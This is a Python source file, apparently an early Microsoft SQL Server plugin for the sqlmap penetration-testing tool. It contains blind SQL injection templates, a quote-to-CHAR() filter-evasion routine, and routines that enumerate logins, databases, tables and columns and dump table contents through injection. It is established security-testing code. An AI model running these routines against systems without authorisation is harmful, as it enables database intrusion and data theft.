#!/usr/bin/env python


import logging
import random
import re
import time

from lib.union import UnionUse


class MSSQLServerMap(UnionUse):
    """
    This class defines Microsoft SQL Server methods

    @author: Bernardo Damele
    """

    def __init__(self, args):
        self.args = args
        self.logger = logging.getLogger("sqlmapLog")

        self.__banner                 = ""
        self.__currentDb              = ""
        self.__fingerprint            = []
        self.__cachedUsers            = []
        self.__cachedDbs              = []
        self.__cachedTables           = {}
        self.__cachedColumns          = {}


    def unescape(self, expression):
        while True:
            index = expression.find("'")
            if index == -1:
                break

            firstIndex = index + 1
            index = expression[firstIndex:].find("'")

            if index == -1:
                raise Exception, "Unenclosed ' in '%s'" % expression

            lastIndex = firstIndex + index
            old = "'%s'" % expression[firstIndex:lastIndex]
            unescaped = "("

            for i in range(firstIndex, lastIndex):
                unescaped += "CHAR(%d)" % (ord(expression[i]))
                if i < lastIndex - 1:
                    unescaped += "+"

            unescaped += ")"
            expression = expression.replace(old, unescaped)

        return expression


    def createStm(self):
        return self.injectionStm(" AND ASCII(SUBSTRING((%s), %d, 1)) > %d",
                                 " AND ASCII(SUBSTRING((%s), %d, 1)) > %d AND '1'='1",
                                 " AND ASCII(SUBSTRING((%s), %d, 1)) > %d AND \"1\"=\"1")


    def getFingerprint(self):
        if not self.args.exaustiveFp:
            return "Microsoft SQL Server"

        actVer = self.parseFp("Microsoft SQL Server", self.__fingerprint)
        value = "active fingerprint: %s" % actVer

        if self.__banner:
            banVer = re.search("Microsoft SQL Server\s+([\d\.]+) - ([\d\.]+)", self.__banner)
            if banVer:
                release = "Microsoft SQL Server %s, version" % banVer.groups()[0]
                banVer = banVer.groups()[1]
                banVer = self.parseFp(release, [banVer])

            blank = " " * 16
            value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)

        self.args.fingerprint = value

        return value


    def getBanner(self):
        logMsg = "fetching banner"
        self.logger.info(logMsg)

        if not self.__banner:
            self.__banner = self.getValue("@@VERSION")

        return self.__banner


    def getCurrentUser(self):
        logMsg = "fetching current user"
        self.logger.info(logMsg)

        return self.getValue("USER_NAME()")


    def getCurrentDb(self):
        logMsg = "fetching current database"
        self.logger.info(logMsg)

        if self.__currentDb:
            return self.__currentDb
        else:
            return self.getValue("DB_NAME()")


    def getUsers(self):
        logMsg = "fetching number of database users"
        self.logger.info(logMsg)

        stm = "SELECT LTRIM(STR(COUNT(name))) FROM master..syslogins"

        count = self.getValue(stm)

        if not len(count) or count == "0":
            errMsg = "unable to retrieve the number of database users"
            raise Exception, errMsg

        logMsg = "fetching database users"
        self.logger.info(logMsg)

        users = []

        for index in range(int(count)):
            stm  = "SELECT TOP 1 name FROM master..syslogins "
            stm += "WHERE name NOT IN (SELECT TOP %d name " % index
            stm += "FROM master..syslogins ORDER BY name) "
            stm += "ORDER BY name"

            user = self.getValue(stm)
            users.append(user)

        if not users:
            raise Exception, "unable to retrieve the database users"

        return users


    def getPasswordHashes(self):
        errMsg  = "Microsoft SQL Server plugin does not support "
        errMsg += "the password hashes functionality yet"
        raise Exception, errMsg


    def getDbs(self):
        logMsg = "fetching number of databases"
        self.logger.info(logMsg)

        stm = "SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases"

        count = self.getValue(stm)

        if not len(count) or count == "0":
            errMsg = "unable to retrieve the number of databases"
            raise Exception, errMsg


        logMsg = "fetching database names"
        self.logger.info(logMsg)

        dbs = []

        for index in range(int(count)):
            stm  = "SELECT TOP 1 name FROM master..sysdatabases "
            stm += "WHERE name NOT IN (SELECT TOP %d name " % index
            stm += "FROM master..sysdatabases ORDER BY name) "
            stm += "ORDER BY name"

            db = self.getValue(stm)
            dbs.append(db)

        if dbs:
            self.__cachedDbs = dbs
        else:
            errMsg = "unable to retrieve the database names"
            raise Exception, errMsg

        return dbs


    def getTables(self):
        if not self.args.db:
            if not len(self.__cachedDbs):
                dbs = self.getDbs()
            else:
                dbs = self.__cachedDbs
        else:
            if "," in self.args.db:
                dbs = self.args.db.split(",")
            else:
                dbs = [self.args.db]

        dbTables = {}

        for db in dbs:
            logMsg = "fetching number of tables for database '%s'" % db
            self.logger.info(logMsg)

            stm  = "SELECT LTRIM(STR(COUNT(table_name))) FROM "
            stm += "%s.information_schema.tables " % db
            stm += "WHERE table_type = 'BASE TABLE'"

            count = self.getValue(stm)

            if not len(count) or count == "0":
                warnMsg  = "unable to retrieve the number of "
                warnMsg += "tables for database '%s'" % db
                self.logger.warn(warnMsg)

                continue

            logMsg = "fetching tables for database '%s'" % db
            self.logger.info(logMsg)

            tables = []

            for index in range(int(count)):
                stm  = "SELECT TOP 1 table_name FROM "
                stm += "%s.information_schema.tables WHERE " % db
                stm += "table_type = 'BASE TABLE' AND table_name "
                stm += "NOT IN (SELECT TOP %d table_name " % index
                stm += "FROM %s.information_schema.tables WHERE " % db
                stm += "table_type = 'BASE TABLE' ORDER BY table_name) "
                stm += "ORDER BY table_name"

                table = self.getValue(stm)
                tables.append(table)

            if tables:
                dbTables[db] = tables
            else:
                warnMsg  = "unable to retrieve the tables "
                warnMsg += "for database '%s'" % db
                self.logger.warn(warnMsg)

        if dbTables:
            self.__cachedTables = dbTables
        elif not self.args.db:
            errMsg = "unable to retrieve the tables for any database"
            raise Exception, errMsg

        return dbTables


    def getColumns(self):
        if not self.args.tbl:
            errMsg = "missing table parameter"
            raise Exception, errMsg

        if "." in self.args.tbl:
            self.args.db, self.args.tbl = self.args.tbl.split(".")

        if not self.args.db:
            errMsg  = "missing database parameter which is "
            errMsg += "mandatory to get table columns on "
            errMsg += "Microsoft SQL Server plugin"
            raise Exception, errMsg

        logMsg  = "fetching number of columns for table "
        logMsg += "'%s' on database '%s'" % (self.args.tbl, self.args.db)
        self.logger.info(logMsg)

        stm  = "SELECT LTRIM(STR(COUNT(column_name))) FROM "
        stm += "%s.information_schema.columns, " % self.args.db
        stm += "%s.information_schema.tables " % self.args.db
        stm += "WHERE %s.information_schema" % self.args.db
        stm += ".columns.table_name = '%s' AND " % self.args.tbl
        stm += "%s.information_schema.columns.table_name" % self.args.db
        stm += "= %s.information_schema.tables.table_name " % self.args.db
        stm += "AND %s.information_schema.tables.table_type " % self.args.db
        stm += "= 'BASE TABLE'"

        count = self.getValue(stm)

        if not len(count) or count == "0":
            errMsg  = "unable to retrieve the number of columns "
            errMsg += "for table '%s' " % self.args.tbl
            errMsg += "on database '%s'" % self.args.db
            raise Exception, errMsg

        logMsg  = "fetching columns for table '%s' " % self.args.tbl
        logMsg += "on database '%s'" % self.args.db
        self.logger.info(logMsg)

        tableColumns = {}
        table = {}
        columns = {}

        for index in range(int(count)):
            stm  = "SELECT TOP 1 column_name FROM "
            stm += "%s.information_schema.columns, " % self.args.db
            stm += "%s.information_schema.tables " % self.args.db
            stm += "WHERE %s.information_schema" % self.args.db
            stm += ".columns.table_name = '%s' AND " % self.args.tbl
            stm += "%s.information_schema.columns.table_name" % self.args.db
            stm += "= %s.information_schema.tables.table_name " % self.args.db
            stm += "AND %s.information_schema.tables.table_type " % self.args.db
            stm += "= 'BASE TABLE' AND column_name NOT IN "
            stm += "(SELECT TOP %d column_name FROM " % index
            stm += "%s.information_schema.columns, " % self.args.db
            stm += "%s.information_schema.tables " % self.args.db
            stm += "WHERE %s.information_schema" % self.args.db
            stm += ".columns.table_name = '%s' AND " % self.args.tbl
            stm += "%s.information_schema.columns.table_name" % self.args.db
            stm += "= %s.information_schema.tables.table_name " % self.args.db
            stm += "AND %s.information_schema.tables.table_type " % self.args.db
            stm += "= 'BASE TABLE' ORDER BY column_name) ORDER BY column_name"

            column = self.getValue(stm)

            stm  = "SELECT data_type FROM "
            stm += "%s.information_schema.columns " % self.args.db
            stm += "WHERE %s.information_schema.columns." % self.args.db
            stm += "column_name = '%s' AND " % column
            stm += "%s.information_schema" % self.args.db
            stm += ".columns.table_name = '%s'" % self.args.tbl

            coltype = self.getValue(stm)
            columns[column] = coltype

        if columns:
            table[self.args.tbl] = columns
            tableColumns[self.args.db] = table
        else:
            errMsg  = "unable to retrieve the columns for "
            errMsg += "table '%s' " % self.args.tbl
            errMsg += "on database '%s'" % self.args.db
            raise Exception, errMsg

        self.__cachedColumns[self.args.db] = table

        return tableColumns


    def dumpTable(self):
        if not self.args.tbl:
            errMsg = "missing table parameter"
            raise Exception, errMsg

        if "." in self.args.tbl:
            self.args.db, self.args.tbl = self.args.tbl.split(".")

        if not self.args.db:
            errMsg  = "missing database parameter which is "
            errMsg += "mandatory to get table columns on "
            errMsg += "Microsoft SQL Server plugin"
            raise Exception, errMsg

        if not self.__cachedColumns:
            self.__cachedColumns = self.getColumns()

        logMsg  = "fetching number of entries for table "
        logMsg += "'%s' on database '%s'" % (self.args.tbl, self.args.db)
        self.logger.info(logMsg)

        fromExpr = "%s..%s" % (self.args.db, self.args.tbl)
        columnValues = {}
        stm = "SELECT LTRIM(STR(COUNT(*))) FROM %s" % fromExpr

        count = self.getValue(stm)

        if not len(count) or count == "0":
            errMsg  = "unable to retrieve the number of entries "
            errMsg += "for table '%s' " % self.args.tbl
            errMsg += "on database '%s'" % self.args.db
            raise Exception, errMsg

        if self.args.col:
            self.args.col = self.args.col.split(',')

        columns = self.__cachedColumns[self.args.db][self.args.tbl]

        for column in columns.keys():
            if self.args.col and column not in self.args.col:
                continue

            logMsg  = "fetching entries of column '%s' for " % column
            logMsg += "table '%s' " % self.args.tbl
            logMsg += "on database '%s'" % self.args.db
            self.logger.info(logMsg)

            length = 0
            values = []
            columnData = {}
            columnValues[column] = {}

            for index in range(int(count)):
                stm  = "SELECT TOP 1 %s FROM %s " % (column, fromExpr)
                stm += "WHERE %s NOT IN (SELECT TOP %d " % (column, index)
                stm += "%s FROM %s)" % (column, fromExpr)
                value = self.getValue(stm)

                length = max(length, len(str(value)))
                values.append(value)

            if length < len(column):
                columnData["length"] = len(column)
            else:
                columnData["length"] = length

            columnData["values"] = values
            columnValues[column] = columnData

        if columnValues:
            infos = {}

            if self.args.db:
                infos["db"] = self.args.db
            else:
                infos["db"] = None
            infos["table"] = self.args.tbl
            infos["count"] = count

            columnValues["__infos__"] = infos
        else:
            errMsg  = "unable to retrieve the entries for "
            errMsg += "table '%s' " % self.args.tbl
            errMsg += "on database '%s'" % self.args.db
            raise Exception, errMsg

        return columnValues


    def getFile(self, filename):
        errMsg  = "Microsoft SQL Server plugin does "
        errMsg += "not support file reading"
        raise Exception, errMsg


    def getExpr(self, expression):
        if self.args.unionUse:
            return self.unionUse(expression)
        else:
            return self.getValue(expression)


    def checkDbms(self):
        if self.args.dbms == "microsoft sql server":
            self.args.fingerprint = "Microsoft SQL Server"

            if not self.args.exaustiveFp:
                return True

        logMsg = "testing Microsoft SQL Server"
        self.logger.info(logMsg)

        randInt = str(random.randint(1, 9))
        stm = "LTRIM(STR(LEN(%s)))" % randInt

        if self.getValue(stm) == "1":
            self.args.fingerprint = "Microsoft SQL Server"

            if not self.args.exaustiveFp:
                return True

            self.__fingerprint = []

            if self.args.getBanner:
                self.__banner = self.getValue("@@VERSION")

            return True
        else:
            warnMsg = "the remote DMBS is not Microsoft SQL Server"
            self.logger.warn(warnMsg)

            return False

